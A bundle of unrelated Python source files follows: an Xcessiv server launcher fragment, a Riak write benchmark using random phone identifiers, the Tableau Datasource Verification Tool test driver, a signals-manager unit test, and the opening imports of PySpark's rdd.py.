parser.add_argument('-D', '--redisdb', help='Redis database number', type=int)
args = parser.parse_args()
# Check if Windows
if os.name == 'nt':
raise OSError('Xcessiv has detected that you are using Windows. '
'Unfortunately, Xcessiv does not currently support Windows. '
'The accepted workaround for this is to use Docker to run '
'Xcessiv instead. Please check the Xcessiv documentation for '
'more details.')
# Overwrite configuration from configuration file
default_config_path = os.path.join(os.path.expanduser('~'), '.xcessiv/config.py')
if os.path.exists(default_config_path):
print('Config file found at ' + default_config_path)
app.config.from_pyfile(default_config_path)
# Overwrite configuration from command line arguments
cli_config = {
'REDIS_HOST': args.host,
'REDIS_PORT': args.redisport,
'REDIS_DB': args.redisdb,
'XCESSIV_PORT': args.port,
'NUM_WORKERS': args.worker
}
cli_config = dict((key, value) for key, value in iteritems(cli_config) if value is not None)
app.config.update(**cli_config)
redis_conn = (Redis(app.config['REDIS_HOST'],
app.config['REDIS_PORT'],
app.config['REDIS_DB']))
redis_conn.get(None) # will throw exception if Redis is unavailable
cwd = os.getcwd()
print(cwd)
processes = []
try:
server_proc = Process(target=launch, args=(app,))
server_proc.start()
for i in range(app.config['NUM_WORKERS']):
p = Process(target=runworker, args=(app,))
processes.append(p)
p.start()
server_proc.join()
finally:
for proc in processes:
proc.terminate()
proc.join()
server_proc.terminate()
server_proc.join()
if __name__ == '__main__':
main()
|
test_lib_index.py
|
#!/usr/bin/python
# This Python file uses the following encoding: utf-8
'''
@author: Denis Gudtsov
'''
# this is simple benchmark test fir riak.
from lib_index import *
from riak_search import *
from multiprocessing import Process, freeze_support
import os
from timeit import default_timer as timer
import string
import random
#sys.path.append('/home/denis/soft/liclipse/pyvmmonitor/public_api')
#import pyvmmonitor
#pyvmmonitor.connect()
bucket = 'sorm3'
bucket_type = 'sorm'
value_size = 1024
kvp_pairs = 1000
#
proc_num = 10
#key_format = 'key_{pid}_{id}'
#value_format = '"value":"{}"'
def get_int(r=11):
return ''.join(random.choice(string.digits) for _ in range(r))
def run_test (idx):
pid = os.getpid()
# print "pid: " , pid
# pids.append(pid)
# todo: optimize random
value = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(value_size))
# print json_value
for i in range(kvp_pairs):
# json_value = '{'+ value_format.format(value) +'}'
call = Call(Call_proto)
call.meta['time_start_i'] = pid+i
call.meta['A']['msisdn_s'] = get_int(11)
call.meta['A']['imsi_s'] = get_int(15)
call.meta['A']['imei_s'] = get_int(15)
call.meta['B']['msisdn_s'] = get_int(11)
call.meta['B']['imsi_s'] = get_int(15)
call.meta['B']['imei_s'] = get_int(15)
call.meta['callid_s'] = value
call.update_uniq_key()
# json_value = json.JSONEncoder().encode(call.meta)
# idx.set(key_format.format(pid=pid,id=i), call.get_json(), bucket)
idx.set(call.update_uniq_key(), call.meta, bucket)
return
if __name__ == '__main__':
freeze_support()
# print get_int(11)
nodes_remote=[{'host':'192.168.90.57','pb_port':8087},
{'host':'192.168.90.58','pb_port':8087}
]
nodes_local=[{'host':'10.10.10.101','pb_port':8087},
{'host':'10.10.10.102','pb_port':8087},
{'host':'10.10.10.103','pb_port':8087},
{'host':'10.10.10.104','pb_port':8087},
{'host':'10.10.10.105','pb_port':8087},
{'host':'10.10.10.106','pb_port':8087}
]
# idx = Index( '192.168.90.58', 8087 )
# idx = Index(nodes=nodes_local)
idx = Index(nodes=nodes_remote)
# idx.create_bucket(bucket)
# idx.create_search_index('sorm_index')
idx.create_bucket(bucket,bucket_type)
# run_test(idx)
processes = [
Process(target=run_test, args=(idx,))
for i in range(proc_num)
]
print "starting all processes, count=", len(processes)
start = timer()
map(lambda p: p.start(), processes)
print "started at ", start
print "all processes are running now, waiting..."
map(lambda p: p.join(), processes)
end = timer()
print "finished at ", end
print "total, seconds: ",(end - start)
print "total kvp wrote: ", kvp_pairs*(proc_num)
print "each kvp size: ", value_size
print "TPS: ",kvp_pairs*(proc_num)/(end - start)
idx.destroy()
exit
|
tdvt.py
|
"""
Test driver script for the Tableau Datasource Verification Tool
"""
import sys
if sys.version_info[0] < 3:
raise EnvironmentError("TDVT requires Python 3 or greater.")
import argparse
import glob
import json
import pathlib
import queue
import shutil
import threading
import time
import zipfile
from pathlib import Path
from typing import List, Optional, Tuple, Union
from .config_gen.datasource_list import print_ds, print_configurations, print_logical_configurations
from .config_gen.tdvtconfig import TdvtInvocation
from .config_gen.test_config import TestSet, SingleLogicalTestSet, SingleExpressionTestSet, FileTestSet, TestConfig, RunTimeTestConfig
from .setup_env import create_test_environment, add_datasource
from .tabquery import *
from .tdvt_core import generate_files, run_diff, run_tests
from .version import __version__
# This contains the dictionary of configs you can run.
from .config_gen.datasource_list import WindowsRegistry, MacRegistry, LinuxRegistry
class TestOutputFiles(object):
output_actuals = 'tdvt_actuals_combined.zip'
output_tabquery_log = 'tabquery_logs.zip'
output_csv = "test_results_combined.csv"
output_json = "tdvt_output_combined.json"
all_output_files = [output_actuals, output_csv, output_json, output_tabquery_log]
@staticmethod
def copy_output_file(src_name, src_dir, dst, trim_header, append=True):
src = os.path.join(src_dir, src_name)
dst = os.path.join(os.getcwd(), dst)
logging.debug("Copying {0} to {1}".format(src, dst))
try:
dst_exists = os.path.isfile(dst)
src_file = open(src, 'r', encoding='utf8')
mode = 'w' if not dst_exists or not append else 'a'
dst_file = open(dst, mode, encoding='utf8')
line_count = 0
for line in src_file:
line_count += 1
if line_count == 1 and trim_header and dst_exists:
continue
dst_file.write(line)
src_file.close()
dst_file.close()
except IOError as e:
logging.debug("Exception while copying files: " + str(e))
return
def do_test_queue_work(i, q):
"""This will be called in a queue.join() context, so make sure to mark all work items as done and
continue through the loop. Don't try and exit or return from here if there are still work items in the queue.
See the python queue documentation."""
abort_test_run = False
while True:
# This blocks if the queue is empty.
work = q.get()
work.run()
q.task_done()
class TestRunner():
def __init__(self, test_set: TestSet, test_config: TdvtInvocation, lock, verbose, thread_id):
threading.Thread.__init__(self)
self.test_set = test_set
self.test_config = test_config
self.error_code = 0
self.thread_id = thread_id
self.verbose = verbose
self.thread_lock = lock
self.temp_dir = make_temp_dir([self.test_config.suite_name, str(thread_id)])
self.test_config.output_dir = self.temp_dir
def copy_files_to_zip(self, dst_file_name, src_dir, is_logs):
dst = os.path.join(os.getcwd(), dst_file_name)
mode = 'w' if not os.path.isfile(dst) else 'a'
optional_dir_name = self.test_config.config_file.replace('.', '_')
if is_logs is True:
log_dir = os.path.join(src_dir, optional_dir_name)
glob_path = glob.glob(os.path.join(log_dir, '*.txt'))
glob_path.extend(glob.glob(os.path.join(log_dir, '*.log')))
glob_path.extend(glob.glob(os.path.join(log_dir, 'crashdumps/*')))
else:
glob_path = glob.glob(os.path.join(src_dir, 'actual.*'))
with zipfile.ZipFile(dst, mode, zipfile.ZIP_DEFLATED) as myzip:
for actual in glob_path:
path = pathlib.PurePath(actual)
file_to_be_zipped = path.name
inner_output = os.path.join(optional_dir_name, file_to_be_zipped)
myzip.write(actual, inner_output)
def copy_output_files(self):
TestOutputFiles.copy_output_file("test_results.csv", self.temp_dir, TestOutputFiles.output_csv, True)
def copy_test_result_file(self):
src = os.path.join(self.temp_dir, "tdvt_output.json")
dst = os.path.join(os.getcwd(), TestOutputFiles.output_json)
try:
if not os.path.isfile(dst):
shutil.copyfile(src, dst)
else:
src_file = open(src, 'r', encoding='utf8')
results = json.load(src_file)
src_file.close()
dst_file = open(dst, 'r', encoding='utf8')
existing_results = json.load(dst_file)
dst_file.close()
existing_results['failed_tests'].extend(results['failed_tests'])
existing_results['successful_tests'].extend(results['successful_tests'])
existing_results['skipped_tests'].extend(results['skipped_tests'])
existing_results['disabled_tests'].extend(results['disabled_tests'])
# Check the newly succeeding tests, and if they are in the existing failed
# test list, remove them from the failed test list since they now succeed
for element in results['successful_tests']:
for failed in existing_results['failed_tests']:
if element['test_name'] == failed['test_name']:
existing_results['failed_tests'].remove(failed)
dst_file = open(dst, 'w', encoding='utf8')
json.dump(existing_results, dst_file)
dst_file.close()
except IOError:
return
def copy_files_and_cleanup(self):
left_temp_dir = False
try:
self.copy_files_to_zip(TestOutputFiles.output_actuals, self.temp_dir, is_logs=False)
self.copy_files_to_zip(TestOutputFiles.output_tabquery_log, self.temp_dir, is_logs=True)
self.copy_output_files()
self.copy_test_result_file()
except Exception as e:
print(e)
pass
try:
if not self.test_config.leave_temp_dir:
shutil.rmtree(self.temp_dir)
else:
left_temp_dir = True
except:
pass
return left_temp_dir
def run(self):
# Send output to null.
DEVNULL = open(os.devnull, 'wb')
output = DEVNULL if not self.verbose else None
logging.debug("\nRunning tdvt " + str(self.test_config) + " tdvt thread id: " + str(self.thread_id) + "\n")
print("Running {0} {1} {2}\n".format(self.test_config.suite_name, self.test_config.config_file,
str(self.thread_id)))
start_time = time.time()
self.test_config.thread_id = self.thread_id
failed_tests, skipped_tests, disabled_tests, total_tests = run_tests(self.test_config, self.test_set)
logging.debug("\nFinished tdvt " + str(self.test_config) + "\n")
print("\nFinished {0} {1} {2}\n".format(self.test_config.suite_name, self.test_config.config_file,
str(self.thread_id)))
self.failed_tests = failed_tests
self.skipped_tests = skipped_tests
self.disabled_tests = disabled_tests
self.total_tests = total_tests
def delete_output_files(root_dir):
for f in TestOutputFiles.all_output_files:
out_file = os.path.join(root_dir, f)
for f in glob.glob(out_file):
if os.path.exists(out_file):
try:
os.unlink(out_file)
except Exception as e:
print(e)
continue
def get_datasource_registry(platform):
"""Get the datasources to run based on the suite parameter."""
if sys.platform.startswith("darwin"):
reg = MacRegistry()
elif sys.platform.startswith("linux"):
reg = LinuxRegistry()
else:
reg = WindowsRegistry()
return reg
def enqueue_single_test(args, ds_info: TestConfig, suite) -> Union[Tuple[None, None], Tuple[Union[SingleLogicalTestSet, SingleExpressionTestSet], TdvtInvocation]]: # noqa: E501
if not args.command == 'run-pattern' or not args.tds_pattern or (args.logical_pattern and args.expression_pattern):
return None, None
test_set = None
if args.logical_pattern:
test_set = SingleLogicalTestSet(suite, get_root_dir(), args.logical_pattern, args.tds_pattern,
args.test_pattern_exclude, ds_info)
else:
test_set = SingleExpressionTestSet(suite, get_root_dir(), args.expression_pattern, args.tds_pattern,
args.test_pattern_exclude, ds_info)
#Only try and run tests if there are some.
if not test_set.generate_test_file_list():
return None, None
tdvt_invocation = TdvtInvocation(from_args=args, test_config=ds_info)
tdvt_invocation.tds = test_set.tds_name
tdvt_invocation.logical = test_set.is_logical
tdvt_invocation.config_file = test_set.config_name
return test_set, tdvt_invocation
def enqueue_failed_tests(run_file: Path, root_directory, args, rt: RunTimeTestConfig = None):
try:
with run_file.open('r', encoding='utf8') as file:
tests = json.load(file)
except IOError as e:
logging.error("Error opening " + str(run_file) + " error: " + str(e))
return
delete_output_files(os.getcwd())
all_test_configs = {}
all_tdvt_test_configs = {}
all_test_pairs = []
failed_tests = tests['failed_tests']
# Go through the failed tests and group the ones that can be run together in a FileTestSet.
for f in failed_tests:
test_file_path = f['test_file']
expected_message = f['expected_message'] if 'expected_message' in f else ''
test_root_dir = root_directory
tds_base = os.path.split(f['tds'])[1]
tds = get_tds_full_path(root_directory, tds_base)
logging.debug("Found failed test: " + test_file_path + " and tds " + tds)
tdvt_invocation = TdvtInvocation(from_json=f['test_config'])
if rt:
tdvt_invocation.set_run_time_test_config(rt)
tdvt_invocation.tds = tds
tdvt_invocation.leave_temp_dir = is_test(args) and args.noclean if args else False
suite_name = f['test_config']['suite_name']
password_file = f['password_file'] if 'password_file' in f else ''
# Use a hash of the test file path to distinguish unique test runs (since the config only supports one test path).
# other wise two tests with the same name could show up and the first result file would overwrite the second.
tt = "L" if tdvt_invocation.logical else "E"
test_set_unique_id = hashlib.sha224(
(os.path.split(test_file_path)[0] + "_" + tds_base + "_" + tt).replace("-", "_").encode())
test_set_unique_id = test_set_unique_id.hexdigest()
test_set_config = None
if not suite_name in all_test_configs:
all_test_configs[suite_name] = {}
if not test_set_unique_id in all_test_configs[suite_name]:
tdvt_invocation.output_dir = make_temp_dir([test_set_unique_id])
all_tdvt_test_configs[test_set_unique_id] = tdvt_invocation
run_time_config = RunTimeTestConfig(60*60, 1)
test_set_config = TestConfig(suite_name, '', run_time_config)
all_test_configs[suite_name][test_set_unique_id] = test_set_config
else:
test_set_config = all_test_configs[suite_name][test_set_unique_id]
current_test_set = None
if tdvt_invocation.logical:
current_test_set = test_set_config.get_logical_tests(test_set_unique_id)
else:
current_test_set = test_set_config.get_expression_tests(test_set_unique_id)
if current_test_set and len(current_test_set) == 1:
current_test_set = current_test_set[0]
if not current_test_set:
current_test_set = FileTestSet(suite_name, test_root_dir, test_set_unique_id, tds, tdvt_invocation.logical, suite_name,
password_file, expected_message)
if tdvt_invocation.logical:
test_set_config.add_logical_testset(current_test_set)
else:
test_set_config.add_expression_testset(current_test_set)
current_test_set.append_test_file(test_file_path)
for suite_names in all_test_configs:
for test_set_id in all_test_configs[suite_names]:
test_set_config = all_test_configs[suite_names][test_set_id]
for each_test_set in test_set_config.get_logical_tests() + test_set_config.get_expression_tests():
tdvt_invocation = all_tdvt_test_configs[test_set_id]
all_test_pairs.append((each_test_set, tdvt_invocation))
logging.debug("Queuing up tests: " + str(tdvt_invocation))
return all_test_pairs
def enqueue_tests(ds_info, args, suite):
tests = []
test_set_configs = []
if not is_test(args):
return test_set_configs
logging.debug("Enqueing tests for " + ds_info.dsname)
if args.logical_only or args.expression_only:
if args.logical_only:
tests.extend(ds_info.get_logical_tests(args.logical_only))
if args.expression_only:
tests.extend(ds_info.get_expression_tests(args.expression_only))
else:
tests.extend(ds_info.get_logical_tests(args.logical_only))
tests.extend(ds_info.get_expression_tests(args.expression_only))
# Make sure there are tests.
if not tests:
logging.error("No tests found")
return test_set_configs
for x in tests:
if not x.generate_test_file_list():
logging.error("No tests found for config " + str(x))
return test_set_configs
for test_set in tests:
tdvt_invocation = TdvtInvocation(from_args=args, test_config = ds_info)
tdvt_invocation.logical = test_set.is_logical_test()
tdvt_invocation.tds = test_set.tds_name
tdvt_invocation.config_file = test_set.config_name
test_set_configs.append((test_set, tdvt_invocation))
return test_set_configs
def get_level_of_parallelization(args):
# This indicates how many database/test suite combinations to run at once
max_threads = 6
if is_test(args) and args.thread_count:
max_threads = args.thread_count
max_threads = get_max_process_level_of_parallelization(max_threads)
print("Setting tdvt thread count to: " + str(max_threads))
return max_threads
list_usage_text = '''
Show all test suites or list the contents of a specific suite.
'''
list_logical_usage_text = '''
Show logical configs. The argument can be empty to list all, or you can specify a config by name.
'''
run_usage_text = '''
The 'run' argument can take a single datasource, a list of data sources, or a test suite name in any combination.
run postgres_odbc,postgres_jdbc
The 'run' argument can also take the --verify flag to run a connection test against tests with SmokeTest = True set.
run postgres_odbc --verify
Both logical and expression tests are run by default.
Run all expression tests
run postgres_odbc -e
Run all logical tests
run postgres_odbc -q
There are multiple suites of expression tests, for example, standard and LOD (level of detail). The config files that drive the tests
are named expression_test.sqlserver.cfg and expression.lod.sqlserver.cfg.
To run just one of those try entering part of the config name as an argument:
run postgres_odbc -e lod
'''
run_pattern_usage_text = '''
Run one expression test against many datasources
run-pattern postgres_odbc --exp exprtests/standard/setup.date.datepart.second*.txt --tdp cast_calcs.*.tds
Run one logical query test against many datasources
run-pattern postgres_odbc --logp logicaltests/setup/calcs/setup.BUGS.B1713.?.xml --tdp cast_calcs.*.tds
The 'exp' argument is a glob pattern that is used to find the test file using the relative test path.
The 'test-ex' argument can be used to exclude test files. This is a regular expression pattern.
The tds pattern is used to find the tds. Use a '*' character where the tds name will be substituted,
ie cast_calcs.*.tds
This can be combined with * to run an arbitrary set of 'correct' logical query tests against a datasources
run-pattern postgres_odbc --logp logicaltests/setup/calcs/setup.BUGS.*.?.xml --tdp cast_calcs.*.tds
Alternatively
run-pattern postgres_odbc --logp logicaltests/setup/calcs/setup.BUGS.*.dbo.xml --tdp cast_calcs.*.tds
But skip 59740?
run-pattern postgres_odbc --logp logicaltests/setup/calcs/setup.BUGS.*.dbo.xml --tdp cast_calcs.*.tds --test-ex 59740
'''
action_usage_text = '''
'''
run_file_usage_text = '''
'''
def create_parser():
parser = argparse.ArgumentParser(description='TDVT - Tableau Datasource Verification Tool.')
parser.add_argument('--verbose', dest='verbose', action='store_true', help='Verbose output.', required=False)
#Common run test options.
run_test_common_parser = argparse.ArgumentParser(description='Common test run options.', add_help=False)
run_test_common_parser.add_argument('--threads', '-t', dest='thread_count', type=int, help='Max number of threads to use.', required=False)
run_test_common_parser.add_argument('--no-clean', dest='noclean', action='store_true', help='Leave temp dirs.', required=False)
run_test_common_parser.add_argument('--generate', dest='generate', action='store_true', help='Generate logical query test files.', required=False)
run_test_common_parser.add_argument('--compare-sql', dest='compare_sql', action='store_true', help='Compare SQL.', required=False)
run_test_common_parser.add_argument('--nocompare-tuples', dest='nocompare_tuples', action='store_true', help='Do not compare Tuples.', required=False)
run_test_common_parser.add_argument('--compare-error', dest='compare_error', action='store_true', help='Compare error.', required=False)
subparsers = parser.add_subparsers(help='commands', dest='command')
#Get information.
list_parser = subparsers.add_parser('list', help='List information about datasource tests and suites.', usage=list_usage_text)
list_parser.add_argument(dest='list_ds', help='List datasource config.', default='', nargs='?')
list_logical_parser = subparsers.add_parser('list-logical-configs', help='List information about logical configurations.', usage=list_logical_usage_text)
list_logical_parser.add_argument(dest='list_logical_configs', help='List available logical configs.', default='', nargs='?')
#Actions.
action_group = subparsers.add_parser('action', help='Various non-test actions.', usage=action_usage_text)
action_group.add_argument('--setup', dest='setup', action='store_true', help='Create setup directory structure.', required=False)
action_group.add_argument('--add_ds', dest='add_ds', help='Add a new datasource.', required=False)
action_group.add_argument('--diff-test', '-dd', dest='diff', help='Diff the results of the given test (ie exprtests/standard/setup.calcs_data.txt) against the expected files. Can be used with the sql and tuple options.', required=False)
action_group.add_argument('--generate', dest='action_generate', action='store_true', help='Generate logical query test files.', required=False)
#Run tests.
run_test_parser = subparsers.add_parser('run', help='Run tests.', parents=[run_test_common_parser], usage=run_usage_text)
run_test_parser.add_argument('ds', help='Comma separated list of Datasource names or groups to test. See the \'list\' command.', nargs='+')
run_test_parser.add_argument('--verify', dest='smoke_test', action='store_true', help='Verifies the connection to a data source against tests in your .ini file with SmokeTest = True.', required=False) # noqa: E501
run_test_parser.add_argument('--force-run', dest='force_run', action='store_true', help='Attempts to run the tests for a data source, even if its smoke tests fail.')
run_test_parser.add_argument('--logical', '-q', dest='logical_only', help='Only run logical tests whose config file name matches the supplied string, or all if blank.', required=False, default=None, const='*', nargs='?')
run_test_parser.add_argument('--expression', '-e', dest='expression_only', help='Only run expression tests whose config file name matches the suppled string, or all if blank.', required=False, default=None, const='*', nargs='?')
#Run test pattern.
run_test_pattern_parser = subparsers.add_parser('run-pattern', help='Run individual tests using a pattern.', parents=[run_test_common_parser], usage=run_pattern_usage_text)
run_test_pattern_parser.add_argument('ds', help='Comma separated list of Datasource names or groups to test. See the \'list\' command.', nargs='+')
run_test_group = run_test_pattern_parser.add_mutually_exclusive_group(required=True)
run_test_group.add_argument('--exp', dest='expression_pattern', help='Only run expression tests whose name and path matches the supplied string. This is a glob pattern. Also you must set the tds-pattern to use when running the test.', required=False, default=None, const='', nargs='?')
run_test_group.add_argument('--logp', dest='logical_pattern', help='Only run logical tests whose name and path matches the supplied string. this is a glob pattern. Also you must set the tds-pattern to use when running the test. Use a ? to replace the logical query config component of the test name.', required=False, default=None, const='', nargs='?')
run_test_pattern_parser.add_argument('--tdp', dest='tds_pattern', help='The datasource tds pattern to use when running the test. See exp and logp arguments.', required=True, default=None, const='', nargs='?')
run_test_pattern_parser.add_argument('--test-ex', dest='test_pattern_exclude', help='Exclude tests whose name matches the supplied string. This is a regular expression pattern. Can be used with exp and logp arguments. Also set the tds-pattern to use when running the test.', required=False, default=None, const='', nargs='?')
#Run file.
run_file_parser = subparsers.add_parser('run-file', help='Run tests from a file.', parents=[run_test_common_parser], usage=run_file_usage_text)
run_file_parser.add_argument('run_file', help='Json file containing failed tests to run.')
return parser
def init():
parser = create_parser()
args = parser.parse_args()
# Create logger.
logging.basicConfig(filename='tdvt_log_combined.txt', level=logging.DEBUG, filemode='w',
format='%(asctime)s %(message)s')
logger = logging.getLogger()
ch = logging.StreamHandler()
if 'verbose' in args and args.verbose:
# Log to console also.
ch.setLevel(logging.DEBUG)
else:
args.verbose = False
ch.setLevel(logging.WARNING)
logger.addHandler(ch)
logging.debug('TDVT version: ' + str(__version__))
logging.debug('TDVT Arguments: ' + str(args))
ds_reg = get_datasource_registry(sys.platform)
configure_tabquery_path()
return parser, ds_reg, args
def is_test(args):
return args.command in ['run', 'run-pattern', 'run-file']
def active_thread_count(threads):
active = 0
for t in threads:
if t.is_alive():
active += 1
return active
def test_runner(all_tests, test_queue, max_threads):
for i in range(0, max_threads):
worker = threading.Thread(target=do_test_queue_work, args=(i, test_queue))
worker.setDaemon(True)
worker.start()
test_queue.join()
failed_tests = 0
skipped_tests = 0
disabled_tests = 0
total_tests = 0
for work in all_tests:
if work.copy_files_and_cleanup():
print("Left temp dir: " + work.temp_dir)
failed_tests += work.failed_tests if work.failed_tests else 0
skipped_tests += work.skipped_tests if work.skipped_tests else 0
disabled_tests += work.disabled_tests if work.disabled_tests else 0
total_tests += work.total_tests if work.total_tests else 0
return failed_tests, skipped_tests, disabled_tests, total_tests
def run_tests_impl(tests: List[Tuple[TestSet, TestConfig]], max_threads: int, args) -> Optional[Tuple[int, int, int, int]]:
if not tests:
print("No tests found. Check arguments.")
sys.exit()
smoke_test_queue = queue.Queue()
smoke_tests = []
test_queue = queue.Queue()
all_work = []
lock = threading.Lock()
for test_set, test_config in tests:
runner = TestRunner(test_set, test_config, lock, args.verbose, len(all_work) + 1)
if test_set.smoke_test:
smoke_tests.append(runner)
smoke_test_queue.put(runner)
else:
all_work.append(runner)
logging.debug("smoke test queue size is: " + str(len(smoke_tests)))
logging.debug("test queue size is: " + str(len(all_work)))
require_smoke_test = args.command == 'run' and args.smoke_test
force_run = args.command == 'run' and args.force_run
if not smoke_tests:
logging.warning("No smoke tests detected.")
if require_smoke_test:
sys.exit(1)
else:
logging.warning("Tests will run without verifying the data source connection.")
if not all_work and not smoke_tests:
print("No tests found. Check arguments.")
sys.exit()
failing_ds = set()
failed_smoke_tests = 0
skipped_smoke_tests = 0
disabled_smoke_tests = 0
total_smoke_tests = 0
smoke_tests_run = 0
absolute_start_time = time.time()
smoke_test_run_time = 0
if smoke_tests:
smoke_test_threads = min(len(smoke_tests), max_threads)
print("Starting smoke tests. Creating", str(smoke_test_threads), "worker threads.\n")
failed_smoke_tests, skipped_smoke_tests, disabled_smoke_tests, total_smoke_tests = test_runner(
smoke_tests, smoke_test_queue, smoke_test_threads)
smoke_tests_run = total_smoke_tests - disabled_smoke_tests
print("{} smoke test(s) ran. {} smoke tests disabled.".format(smoke_tests_run, disabled_smoke_tests))
smoke_test_run_time = round(time.time() - absolute_start_time, 2)
print("Smoke tests ran in {} seconds.".format(smoke_test_run_time))
if failed_smoke_tests > 0:
print("{} smoke test(s) failed. Please check logs for information.".format(failed_smoke_tests))
failing_ds = set(item.test_set.ds_name for item in smoke_tests if item.failed_tests > 0)
if require_smoke_test:
print("\nSmoke tests failed, exiting.")
sys.exit(1)
if require_smoke_test:
print("\nSmoke tests finished. Exiting.")
sys.exit(0)
if failing_ds and not force_run:
print("Tests for the following data source(s) will not be run: {}".format(', '.join(failing_ds)))
final_work = []
for item in all_work:
if not force_run:
if item.test_set.ds_name in failing_ds:
item.test_set.test_is_skipped = True
final_work.append(item)
test_queue.put(item)
print("\nStarting tests. Creating " + str(max_threads) + " worker threads.")
start_time = time.time()
failed_tests, skipped_tests, disabled_tests, total_tests = test_runner(final_work, test_queue, max_threads)
failed_tests += failed_smoke_tests
skipped_tests += skipped_smoke_tests
disabled_tests += disabled_smoke_tests
total_tests += total_smoke_tests
total_tests_run = total_tests - disabled_tests - skipped_tests
total_passed_tests = total_tests_run - failed_tests
now_time = time.time()
main_test_time = round(now_time - start_time, 2)
total_run_time = round(now_time - absolute_start_time, 2)
print('\nTest Count: {} tests'.format(total_tests))
print("\tPassed tests: {}".format(total_passed_tests))
print("\tFailed tests: " + str(failed_tests))
print("\tTests run: " + str(total_tests_run))
print("\tDisabled tests: " + str(disabled_tests))
print("\tSkipped tests: " + str(skipped_tests))
print("\nOther information:")
print("\tSmoke test time: {} seconds".format(smoke_test_run_time))
print("\tMain test time: {} seconds".format(main_test_time))
print("\tTotal time: {} seconds".format(total_run_time))
return failed_tests, skipped_tests, disabled_tests, total_tests
def get_ds_list(ds):
if not ds:
return []
ds_list = ds[0].split(',')
ds_list = [x.strip() for x in ds_list]
return ds_list
def run_desired_tests(args, ds_registry):
generate_files(ds_registry, False)
ds_to_run = ds_registry.get_datasources(get_ds_list(args.ds))
if not ds_to_run:
sys.exit(0)
if len(ds_to_run) > 0:
delete_output_files(os.getcwd())
if not tabquerycli_exists():
print("Could not find Tabquerycli.")
sys.exit(0)
max_threads = get_level_of_parallelization(args)
test_sets: List[TestSet] = []
for ds in ds_to_run:
ds_info = ds_registry.get_datasource_info(ds)
if not ds_info:
continue
print("Testing " + ds)
max_threads_per_datasource = ds_info.run_time_config.maxthread;
# if has multi datasource to run, then max_threads_per_datasource can not apply.
if max_threads_per_datasource > 0:
print("thread setting in " + ds + ".ini = " + str(max_threads_per_datasource))
if len(ds_to_run) == 1:
max_threads = max_threads_per_datasource
else:
print("Setting cannot apply since you are running multiple datasources.")
suite = ds
if args.command == 'run-pattern':
single_test, single_test_config = enqueue_single_test(args, ds_info, suite)
if single_test:
test_sets.extend([(single_test, single_test_config)])
else:
test_sets.extend(enqueue_tests(ds_info, args, suite))
failed_tests, skipped_tests, disabled_tests, total_tests = run_tests_impl(test_sets, max_threads, args)
return failed_tests
def run_file(run_file: Path, output_dir: Path, threads: int, args) -> int:
"""Rerun all the failed tests listed in the json file."""
logging.debug("Running failed tests from : " + str(run_file))
# See if we need to generate test setup files.
root_directory = get_root_dir()
failed_tests, skipped_tests, disabled_tests, total_tests = \
run_tests_impl(enqueue_failed_tests(run_file, root_directory, args), threads, args)
# This can be a retry-step.
return 0
def run_generate(ds_registry):
start_time = time.time()
generate_files(ds_registry, True)
end_time = time.time() - start_time
print("Done: " + str(end_time))
def main():
parser, ds_registry, args = init()
if args.command == 'action':
if args.setup:
print("Creating setup files...")
create_test_environment()
sys.exit(0)
elif args.add_ds:
add_datasource(args.add_ds, ds_registry)
generate_files(ds_registry, True)
sys.exit(0)
elif args.action_generate:
run_generate(ds_registry)
sys.exit(0)
elif is_test(args):
if args.generate:
run_generate(ds_registry)
# It's ok to call generate and then run some tests, so don't exit here.
if args.command == 'run-file':
output_dir = os.getcwd()
max_threads = get_level_of_parallelization(args)
sys.exit(run_file(Path(args.run_file), Path(output_dir), max_threads, args))
error_code = run_desired_tests(args, ds_registry)
sys.exit(error_code)
elif args.command == 'action' and args.diff:
tdvt_invocation = TdvtInvocation(from_args=args)
run_diff(tdvt_invocation, args.diff)
sys.exit(0)
elif args.command == 'list-logical-configs':
print_logical_configurations(ds_registry, args.list_logical_configs)
sys.exit(0)
elif args.command == 'list':
print_configurations(ds_registry, [args.list_ds], args.verbose)
sys.exit(0)
logging.error("Could not interpret arguments. Nothing done.")
parser.print_help()
sys.exit(-1)
if __name__ == '__main__':
main()
|
test_signals.py
|
import asyncio
import signal
import threading
from time import sleep
from unittest import mock
import pytest
from tamarco.core.signals import SignalsManager, signal_handler
@pytest.mark.asyncio
async def test_signal_manager(event_loop):
signals_manager = SignalsManager()
signals_manager.set_loop(event_loop)
flag1 = False
flag2 = False
def sigalrm_handler(signum, frame):
nonlocal flag1
flag1 = True
async def sigint_handler(signum, frame):
nonlocal flag2
flag2 = True
def exception_handler(signum, frame):
raise Exception
signals_manager.register_signal(sigalrm_handler, signal.SIGALRM)
signals_manager.register_signal(sigint_handler, signal.SIGALRM)
signals_manager.register_signal(exception_handler, signal.SIGQUIT)
assert sigalrm_handler == signals_manager.handlers[signal.SIGALRM][0]
assert sigint_handler == signals_manager.handlers[signal.SIGALRM][1]
assert exception_handler == signals_manager.handlers[signal.SIGQUIT][0]
def use_alarm():
signal.alarm(1)
alarm_thread = threading.Thread(target=use_alarm, name="alarm_thread")
alarm_thread.start()
sleep(1.1)
alarm_thread.join()
assert flag1
# Allow asyncio to execute queued tasks, in this case the asynchronous signal_number handler
await asyncio.sleep(0)
await asyncio.sleep(0)
assert flag2
with mock.patch("tamarco.core.signals.logger") as mock_logger:
signals_manager._dispatch_signal(signal.SIGQUIT, None)
assert mock_logger.warning.called
def test_signal_handler():
@signal_handler(signal.SIGALRM)
def handler():
pass
assert handler in SignalsManager().handlers[signal.SIGALRM]
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.java_gateway import local_connect_and_auth
from pyspark.serializers import AutoBatchedSerializer, BatchedSerializer, NoOpSerializer, \
CartesianDeserializer, CloudPickleSerializer, PairDeserializer, PickleSerializer, \
